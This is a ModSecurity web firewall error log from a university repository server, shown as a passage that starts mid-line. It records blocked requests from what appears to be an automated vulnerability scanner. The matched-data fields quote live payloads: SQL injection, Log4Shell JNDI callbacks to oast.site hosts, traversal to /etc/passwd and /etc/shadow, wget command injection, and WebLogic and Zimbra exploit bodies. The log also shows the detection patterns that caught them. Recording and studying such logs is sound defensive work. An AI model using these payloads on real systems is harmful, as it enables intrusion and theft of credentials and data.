"9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASGMsgAAAAA"]
[Tue Aug 29 11:34:08.372645 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASMgfwAAAAO"]
[Tue Aug 29 11:34:09.322261 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAASLqC0AAAAM"]
[Tue Aug 29 11:34:09.326674 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASGMssAAAAA"]
[Tue Aug 29 11:34:10.363957 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgr5njtup8nj78u.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASNzpYAAAAQ"]
[Tue Aug 29 11:34:10.411629 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAQKOs0AAAAs"]
[Tue Aug 29 11:34:10.435800 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASfNu0AAAAg"]
[Tue Aug 29 11:34:11.303902 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAAShCV0AAAAi"]
[Tue Aug 29 11:34:11.393237 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgyb8jwu9xy1qab.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgyb8jwu9xy1qab.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg6tkp3o7nigoxx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASfNvIAAAAg"]
[Tue Aug 29 11:34:12.398794 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAShCWAAAAAi"]
[Tue Aug 29 11:34:13.316211 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASMggoAAAAO"]
[Tue Aug 29 11:34:15.316503 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgiino9bxhs6ryh.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgiino9bxhs6ryh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPDoNcAAAAP"]
[Tue Aug 29 11:34:15.371609 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASK4fcAAAAI"]
[Tue Aug 29 11:34:16.323016 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASS7@sAAAAY"]
[Tue Aug 29 11:34:16.326382 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repository.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuIAAAAA"]
[Tue Aug 29 11:34:16.326450 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuIAAAAA"]
[Tue Aug 29 11:34:16.400483 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASEJUYAAAAE"]
[Tue Aug 29 11:34:17.352775 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAAPDoOAAAAAP"]
[Tue Aug 29 11:34:19.349063 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlg9qa9a85iu81ny.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASS7-sAAAAY"]
[Tue Aug 29 11:34:19.349432 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASK4gcAAAAI"]
[Tue Aug 29 11:34:19.394477 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASK4gkAAAAI"]
[Tue Aug 29 11:34:21.307435 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "173.252.127.6_e991296ab110e743013426bd94a6b1c96c64612b"): Internal error [hostname "repository.unla.ac.id"] [uri "/index.php/objects/getSpiritsFromVideo.php"] [unique_id "ZO11TMCo-f0AAAQKOuYAAAAs"]
[Tue Aug 29 11:34:23.195626 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAATRZVIAAAAQ"]
[Tue Aug 29 11:34:23.674826 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASK4hMAAAAI"]
[Tue Aug 29 11:34:25.619556 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "repository.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAAT2JPQAAAAz"]
[Tue Aug 29 11:34:26.248078 2023] [:error] [pid 1287] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAUHKJ0AAAA-"]
[Tue Aug 29 11:34:26.333622 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUa3A0AAABP"]
[Tue Aug 29 11:34:26.357143 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgxtzw656usa83p.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUdm2cAAABS"]
[Tue Aug 29 11:34:26.626958 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "repository.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11UsCo-f0AAATzVG4AAAAx"]
[Tue Aug 29 11:34:27.519945 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUDQRkAAAA7"]
[Tue Aug 29 11:34:29.329694 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgtf4tg3uqcbam9.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAAUR82sAAABI"]
[Tue Aug 29 11:34:29.365200 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUZcEUAAABO"]
